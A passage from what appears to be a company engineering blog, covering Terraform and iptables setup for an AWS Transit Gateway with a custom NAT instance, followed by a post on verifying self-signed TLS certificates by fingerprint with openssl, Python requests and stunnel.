The following AWS CLI commands are helpful for inspecting the setup. The first outputs the configuration of every Site-to-Site VPN connection, including all tunnel parameters and, notably, the secret pre-shared keys (PSKs).

$ aws ec2 describe-vpn-connections
$ aws ec2 describe-transit-gateways
$ aws ec2 describe-transit-gateway-attachments

Troubleshooting the IPSec tunnel

Unfortunately, AWS still has not created a way to debug the actual IPsec tunnel establishment, because it does not expose any logs of this stage. The use case that AWS aims to solve is connecting your own on-premises network with your own VPC in the cloud. In that case, you could debug the on-premises side of the IPsec connection. However, if the customer is a third party and the IPsec connection is failing, we are left at the mercy of the third party to debug the issue.

Terraform Configuration of the Transit Gateway

The following Terraform resources set up the Transit Gateway and illustrate the settings discussed above. For brevity, name tags and some other sections have been omitted.

First we define the Transit Gateway and disable all the default routes.



resource "aws_ec2_transit_gateway" "example_transit_gateway" {
  amazon_side_asn = 64512
  auto_accept_shared_attachments = "disable"
  default_route_table_association = "disable"
  default_route_table_propagation = "disable"
  description = "Example Transit Gateway."
  vpn_ecmp_support = "disable"
}

Since we told AWS to not create a default route table for the TGW, we must create it by hand like this:



resource "aws_ec2_transit_gateway_route_table" "example_transit_gateway" {
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
}

The Transit Gateway has a split configuration of "routes" and "attachments." Each route specifies an attachment as its destination. We first create the attachment to the VPC subnet in which the NAT gateway EC2 instance lives (here named private_subnet6):



resource "aws_ec2_transit_gateway_vpc_attachment" "nat_vpc_attachment" {
  vpc_id             = module.vpc.id
  subnet_ids         = [ aws_subnet.private_subnet6.id ]
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
  transit_gateway_default_route_table_association = false
  transit_gateway_default_route_table_propagation = false
}

Next, we add the route that tells the TGW to forward packets destined to 1.2.3.4 to the VPC subnet which we have just attached:



resource "aws_ec2_transit_gateway_route" "nat-egress-ip" {
  destination_cidr_block = "1.2.3.4/32"
  transit_gateway_attachment_id  = aws_ec2_transit_gateway_vpc_attachment.nat_vpc_attachment.id
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id
}

So far we have handled the returning of the packets. Now, let's handle the forward direction. First we define the Customer Gateway and the Site-to-Site VPN connection and then tell TGW to forward packets to it.



resource "aws_customer_gateway" "example_customer" {
  bgp_asn    = 64520
  ip_address = "6.7.8.9" # this would be the public IP of the StrongSwan instance during test
  type       = "ipsec.1"
}

resource "aws_vpn_connection" "example_customer" {
  customer_gateway_id = aws_customer_gateway.example_customer.id
  transit_gateway_id  = aws_ec2_transit_gateway.example_transit_gateway.id
  type                = aws_customer_gateway.example_customer.type
  static_routes_only  = false
}

resource "aws_ec2_transit_gateway_route_table_association" "example_customer" {
  count = length(local.vpn_attachments) # local.vpn_attachments is not shown in this excerpt
  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id
}

resource "aws_ec2_transit_gateway_route" "example_customer" {
  count = length(local.vpn_attachments)
  destination_cidr_block         = "172.31.0.0/16"
  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id
}
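To make the effect of the two routes concrete, here is a minimal Python sketch of a most-specific-prefix lookup over the same two CIDR blocks. It is only a model of the routing decision, not AWS code; the attachment labels and the lookup function are hypothetical names chosen for illustration.

```python
import ipaddress

# Hypothetical labels standing in for the two TGW attachments defined above.
ROUTES = {
    "1.2.3.4/32": "nat_vpc_attachment",   # return path towards the NAT instance
    "172.31.0.0/16": "vpn_attachment",    # forward path towards the customer
}

def lookup(destination, routes=ROUTES):
    """Return the attachment of the most specific matching route, or None."""
    addr = ipaddress.ip_address(destination)
    best = None
    for cidr, attachment in routes.items():
        network = ipaddress.ip_network(cidr)
        if addr in network and (best is None or network.prefixlen > best[0].prefixlen):
            best = (network, attachment)
    return best[1] if best else None

print(lookup("172.31.38.197"))  # address on the customer's side
print(lookup("1.2.3.4"))        # the NAT address
print(lookup("20.0.5.210"))     # no route covers this address
```

In this model, a destination that matches no route gets no attachment, which mirrors the intent of disabling the default routes: only the two explicitly listed destinations are forwarded.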

Terraform configuration of the custom NAT Gateway instance

The challenge in automatically configuring the NAT gateway EC2 instance is (a) to assign an Elastic public IP, and (b) to use the assigned private IP in the iptables rules. The solution is to first define an Elastic Network Interface (ENI) and then to use it in the definition of the instance:



resource "aws_network_interface" "nat_gw" {
  source_dest_check = false # must be disabled for NAT to work
  subnet_id         = module.vpc.sn-private-nat-az1
  security_groups   = [ ... ]
}

resource "aws_eip_association" "nat_gw" {
  network_interface_id = aws_network_interface.nat_gw.id
  allocation_id        = "1.2.3.4" # placeholder: use the allocation ID (eipalloc-...) of the Elastic IP 1.2.3.4
}

resource "aws_instance" "nat_gw" {
  network_interface {
    device_index         = 0
    network_interface_id = aws_network_interface.nat_gw.id
  }

  ...

  user_data = <<EOF
#!/bin/bash
# enable IP forwarding so that the instance can route packets
echo 1 > /proc/sys/net/ipv4/ip_forward
# start from an empty NAT table
iptables -t nat -F
# outbound: traffic to the customer's network leaves with source address 1.2.3.4
iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4
# inbound: traffic addressed to 1.2.3.4 is delivered to this instance's private IP
iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination ${aws_network_interface.nat_gw.private_ip}
EOF
}
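The address rewriting performed by the two iptables rules can be sketched in a few lines of Python. This is a simplified model only: it ignores connection tracking, which in real iptables reverses the translation for reply packets automatically. The private IP 20.0.6.20 is an assumption inferred from the host name in the tcpdump prompt, and the Packet type and function names are hypothetical.

```python
import ipaddress
from typing import NamedTuple

class Packet(NamedTuple):
    src: str
    dst: str

NAT_ADDRESS = "1.2.3.4"                               # the NAT address used above
CUSTOMER_NET = ipaddress.ip_network("172.31.0.0/16")  # the customer's network
NAT_PRIVATE_IP = "20.0.6.20"                          # assumed private IP of the NAT ENI

def prerouting(pkt):
    """DNAT rule: packets addressed to the NAT address go to the NAT instance."""
    if pkt.dst == NAT_ADDRESS:
        return pkt._replace(dst=NAT_PRIVATE_IP)
    return pkt

def postrouting(pkt):
    """SNAT rule: packets bound for the customer's network get the NAT source address."""
    if ipaddress.ip_address(pkt.dst) in CUSTOMER_NET:
        return pkt._replace(src=NAT_ADDRESS)
    return pkt

# A ping from an instance inside the VPC towards the customer's side.
outbound = postrouting(Packet("20.0.5.210", "172.31.38.197"))
# A ping from the customer's side towards the NAT address.
inbound = prerouting(Packet("172.31.38.197", "1.2.3.4"))
print(outbound)
print(inbound)
```

The first packet leaves with 1.2.3.4 as its source, so the customer's side never sees the VPC's internal addressing; the second is delivered to the NAT instance itself rather than to any host behind it.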

Security Considerations

Because we are using NAT, no instance behind the NAT GW instance can be accessed from the customer's network. However, the NAT gateway itself can be reached from the customer's network. The ports which can be accessed are limited by the AWS Security Group attached to the NAT gateway's network interface. For instance, the following inbound Security Group rules would allow the customer's side to only ping the instance and to make HTTPS requests to it:

Type	Protocol	Port Range	Source	Description
HTTPS	TCP	443	172.31.0.0/16	Customer's side
All TCP	TCP	All	20.0.0.0/16	From inside VPC
All ICMP - IPv4	ICMP	All	0.0.0.0/0	To allow pings

Access can also be locked down by restricting the DNAT rule in iptables. With the rule restricted to the icmp protocol as shown below, the remote side is still able to ping the NAT gateway at 1.2.3.4, yet is not able to make HTTPS requests to it.



iptables -t nat -A PREROUTING  -d 1.2.3.4 -p icmp -j DNAT ...

Final Thoughts

We can get more mileage out of the Transit Gateway than from the older Virtual Private Network (VPN) AWS component. That is because the Transit Gateway is indifferent to the source CIDR of the packets that it receives.

We hope that as more companies use the TGW to connect to outside networks using NAT, AWS will support this use case directly in the Site-to-Site VPN settings, so that there is no need to maintain an EC2 instance to perform NAT. We also wish that AWS would expose logs of the IPsec tunnel establishment for Site-to-Site VPN to help with troubleshooting at that stage.

Verification of Self-Signed Certificates

Smarking — Tue, 05 Jan 2021 18:53:38 +0000

When interfacing with third-party web services, one often has to deal with self-signed SSL certificates that trigger verification errors. One workaround is to suppress those errors. (For instance, the curl tool has the --insecure flag for this purpose.) However, at Smarking, we found ways to verify such certificates and to safeguard data communication from Man-in-the-Middle attacks.

Conventionally, a web browser relies on a Public Key Infrastructure (PKI) to verify SSL certificates. Every certificate is signed by another (signing) certificate. That signing certificate must in turn be signed by another, in a chain ending at a trusted certificate. This linkage allows a web server operator to switch to a new SSL certificate without requiring visitors to the website to update their web browsers. Alternatively, the operator could ask users to trust the specific certificate so that the browser would not need to walk up the signature chain to verify it.

An SSL certificate carries inside it a public key of the web server. On a conceptual level, the authenticity of that public key is what allows us to establish an authenticated Diffie-Hellman key exchange between the browser and the server. Thus, if we could verify that it is the correct public key, we would have "verified" the certificate. However, instead of verifying a long public key, we can verify a checksum, which is usually much shorter. A checksum of the entire certificate is called its fingerprint, and it is conventionally formatted as a colon-separated list of hex codes. For instance, here is the SHA-256 fingerprint of the certificate served by https://google.com:

14:71:16:87:6D:F6:76:8E:98:E5:66:62:70:64:F1:0F:F8:0F:87:39:B8:55:4C:47:26:22:DF:FA:7D:1D:A5:FE

To retrieve the details of a website's certificate, click on the lock icon in your browser's URL bar and then inspect the SSL certificate details. Alternatively, you could use the following shell script:

#!/bin/bash
HOST=example.com
PORT=443
PROXY=1.2.3.4:8888

# If your environment does not require an HTTP proxy, delete the '-proxy $PROXY' parameter below
echo quit | openssl s_client -showcerts -servername $HOST -connect $HOST:$PORT -proxy $PROXY > result.txt

The output file result.txt includes the certificate in PEM format and metadata. The PEM format consists of binary data encoded using Base64 into ASCII, enveloped with "begin" and "end" lines like so:

-----BEGIN CERTIFICATE-----
<certificate encoded in base64 encoding>
-----END CERTIFICATE-----

You may feed the result.txt file into the following command to compute the fingerprint of the certificate. (The openssl tool uses the first certificate it finds in the input file and ignores everything else.)

$ openssl x509 -noout -fingerprint -sha256 -inform pem -in result.txt

The above command uses the -sha256 switch, which fixes the length of the fingerprint at 32 bytes. Only a few digest algorithms are in wide use (MD5 yields 16 bytes, SHA-1 yields 20, and SHA-256 yields 32), so the length of a fingerprint identifies the algorithm used to derive it.
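The same computation can be sketched in Python using only the standard library. This is an illustration under stated assumptions rather than a replacement for the openssl command: the function names are hypothetical, and the digest-length table lists only the three common algorithms.

```python
import hashlib
import re
import ssl

# Digest sizes, in bytes, of the commonly used fingerprint algorithms.
ALGORITHM_BY_LENGTH = {16: "md5", 20: "sha1", 32: "sha256"}

PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.DOTALL
)

def first_certificate(text):
    """Return the first PEM certificate block found in text."""
    match = PEM_BLOCK.search(text)
    if match is None:
        raise ValueError("no PEM certificate found")
    return match.group(0)

def fingerprint(pem, algorithm="sha256"):
    """Hash the DER form of a PEM certificate; return colon-separated hex."""
    der = ssl.PEM_cert_to_DER_cert(pem)
    digest = hashlib.new(algorithm, der).digest()
    return ":".join("{:02X}".format(byte) for byte in digest)

def guess_algorithm(fp):
    """Infer the digest algorithm from the byte length of a fingerprint."""
    return ALGORITHM_BY_LENGTH[len(bytes.fromhex(fp.replace(":", "")))]

# Example (assumes result.txt was produced by the shell script above):
# with open("result.txt") as f:
#     print(fingerprint(first_certificate(f.read())))
```

Note that the digest is taken over the decoded binary (DER) form of the certificate, not over the Base64 text, which is why the PEM envelope is stripped first.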

Here are three methods by which you can verify certificates by their fingerprints.

Method #1: Use Python

Verification of certificates by a fingerprint is supported out-of-the-box by the urllib3 library using the assert_fingerprint parameter:

import urllib3
from urllib.parse import urlparse

def http_get_request(url, fingerprint):
  parsed_url = urlparse(url)
  path = parsed_url.path or '/'
  # cert_reqs='CERT_NONE' turns off signature-chain verification, which a
  # self-signed certificate would fail; the fingerprint is still checked
  pool = urllib3.HTTPSConnectionPool(parsed_url.hostname, port=parsed_url.port,
                                     cert_reqs='CERT_NONE',
                                     assert_fingerprint=fingerprint)
  response = pool.urlopen('GET', path)
  return response

response = http_get_request('https://example.com/a/b/c', '14:71:...')
print(response.data)

Notice that the fingerprint option configures an HTTPSConnectionPool object which could then be used to make a series of queries against a website, such that each of the queries would verify the fingerprint of the certificate.

Python's requests library also supports certificate fingerprint verification because it builds upon the urllib3 library. It is based on adapter objects that return the HTTPSConnectionPool objects discussed above, and it provides the method Session.mount(), which allows setting a custom adapter for a particular base URL. Putting this together, we have this code:

import requests
from urllib.parse import urlparse

def create_fingerprint_session(url, fingerprint):
  host = urlparse(url).netloc
  s = requests.Session()
  s.verify = False
  # FingerprintAdapter is defined further below
  s.mount('https://{}/'.format(host), FingerprintAdapter(fingerprint))
  return s

url = 'https://example.com/a/b/c'
session = create_fingerprint_session(url, '14:71:...')
response = session.get(url)
print(response.text)

Note that the verify setting must be set to False; otherwise, the requests library would also try to verify the SSL certificate in the conventional way, by the signature chain and the domain name.

(Note that the verify parameter may also be set to the location of a file that contains a concatenated list of trusted certificates in PEM format. However, the certificates in question are often signed by a custom Certificate Authority (CA) whose own certificate is unknown to us. Thus, we do not use this option and set verify to False instead.)

All that remains now is to implement the FingerprintAdapter. The quickest way is to subclass the HTTPAdapter class and to modify the methods that set up the connection pools so that they include the assert_fingerprint option:

from requests.adapters import HTTPAdapter

class FingerprintAdapter(HTTPAdapter):
  """
  A TransportAdapter that allows to verify certificates by fingerprint
  """
  def __init__(self, fingerprint, *args, **kwargs):
    self._fingerprint = fingerprint
    HTTPAdapter.__init__(self, *args, **kwargs)

  def init_poolmanager(self, *args, **kwargs):
    kwargs['assert_fingerprint'] = self._fingerprint
    return super().init_poolmanager(*args, **kwargs)

  def proxy_manager_for(self, *args, **kwargs):
    kwargs['assert_fingerprint'] = self._fingerprint
    return super().proxy_manager_for(*args, **kwargs)

In summary, set verify=True when working with certificates signed by a trusted CA, otherwise set verify=False and mount a FingerprintAdapter when verifying self-signed certificates by fingerprint. Test that the verification is working by altering the fingerprint value and observing a security error.
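To see why an altered fingerprint must be rejected, it can help to look at the comparison in isolation. The following is a conceptual sketch of a fingerprint check, not the actual urllib3 code; the function name and the stand-in certificate bytes are hypothetical.

```python
import hashlib
import hmac

def matches_fingerprint(der_cert, expected):
    """Return True if the SHA-256 digest of der_cert equals the expected fingerprint."""
    expected_bytes = bytes.fromhex(expected.replace(":", ""))
    actual = hashlib.sha256(der_cert).digest()
    # compare_digest avoids leaking, through timing, how many bytes matched
    return hmac.compare_digest(actual, expected_bytes)

# Stand-in bytes; a real check would use the certificate presented by the server.
cert = b"stand-in for DER-encoded certificate bytes"
good = hashlib.sha256(cert).hexdigest()
# Alter the first hex digit to simulate a wrong fingerprint.
bad = ("1" if good[0] == "0" else "0") + good[1:]

print(matches_fingerprint(cert, good))
print(matches_fingerprint(cert, bad))
```

A change of even one hex digit in the expected value makes the comparison fail, which is the behavior to look for when testing the adapter with a deliberately wrong fingerprint.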

Method #2: Site-wide

What if you wished to use other tools, besides Python, to query web sites that use self-signed certificates? A site-wide solution is to add the self-signed certificate to the list of trusted certificates. If the certificate is found there, the verifier performs no further signature checking.

However, the downside of this method is that a compromised trusted third party could now sign certificates for any domain which all programs on the machine would trust. This is a significant security risk for a long-lived server, but it may be tolerable if "site-wide" does not extend beyond a Docker container which runs a program that only connects to one endpoint.

The following instructions are for Ubuntu or Debian; for other distributions, make necessary adjustments.

Look in the directory /usr/share/ca-certificates and you will see the directory mozilla, with many certificate files inside it. Make your own subdirectory on the same nesting level, for instance /usr/share/ca-certificates/custom, and put in it the self-signed certificates of interest in PEM format, stored as separate files with the extension .crt. Next, edit /etc/ca-certificates.conf and list the custom certificates after the mozilla certificates. For instance:

...
mozilla/USERTrust_RSA_Certification_Authority.crt
custom/example-com-self-signed.crt
custom/another-example-com-self-signed.crt

Next, run the update-ca-certificates command. Once that's done, symlinks to your certificates appear in the /etc/ssl/certs directory. At this point, the curl tool will accept the self-signed certificate from example.com.

However, the fingerprint method described previously has the advantage that it works even if there is a domain name mismatch. A mismatch would happen if you queried the target HTTPS server by an IP address (e.g. https://1.2.3.4/a/b/). If this is your situation, you can add an entry to the /etc/hosts file so that you can query the web server using the precise domain name that is listed inside the self-signed certificate.

The site-wide method works for all tools that rely on the OpenSSL library, which includes curl. However, it is not sufficient for Python's requests library, which by default consults its own bundle of trusted certificates (from the certifi package) instead of the system store.

Method #3: Strip SSL

Another way to allow a variety of tools to access HTTPS websites that use self-signed certificates is to access them through a trusted proxy server that strips the SSL after verifying the legitimacy of the self-signed certificates using fingerprints. We could implement such a proxy server in Python using the techniques above. Alternatively, we could use a utility program called stunnel, which stands for the "Universal SSL Tunnel."

First, prepare a connection.conf configuration file like this one:

pid = /var/run/stunnel1.pid
CApath = /etc/ssl/certs
foreground=yes

[connection1]
verifyChain=no
verifyPeer=yes
client=yes
accept=8081
connect=1.2.3.4:443
sni=example.com

Then, run stunnel with the configuration file as the argument to have https://example.com proxied as http://localhost:8081:

$ stunnel connection.conf >& output.log &
$ curl 'http://localhost:8081/a/b/c'

An important thing to notice in the example configuration file is the verifyChain and verifyPeer options. Together they make stunnel accept the server only if the certificate it presents is itself stored in the CApath directory, which pins the certificate much as a fingerprint check does, and they ignore an incomplete signature chain. These options were added to stunnel in July 2016, in version 5.34. Another thing to notice is that the domain name doesn't matter. The sni parameter is used only to tell the web server which virtual host you are interested in, but it plays no role in validating the certificate.

To run stunnel site-wide, make the following configuration changes: store the configuration as /etc/stunnel/stunnel.conf, remove the foreground=yes line, set pid to /var/run/stunnel.pid, and add further connection sections as needed.

Summary

We have demonstrated three ways to work with self-signed certificates without compromising security. At Smarking, we are trusted by vendors of parking systems to protect their data, and we use such techniques to justify their trust.

To learn more about Smarking, visit www.smarking.com.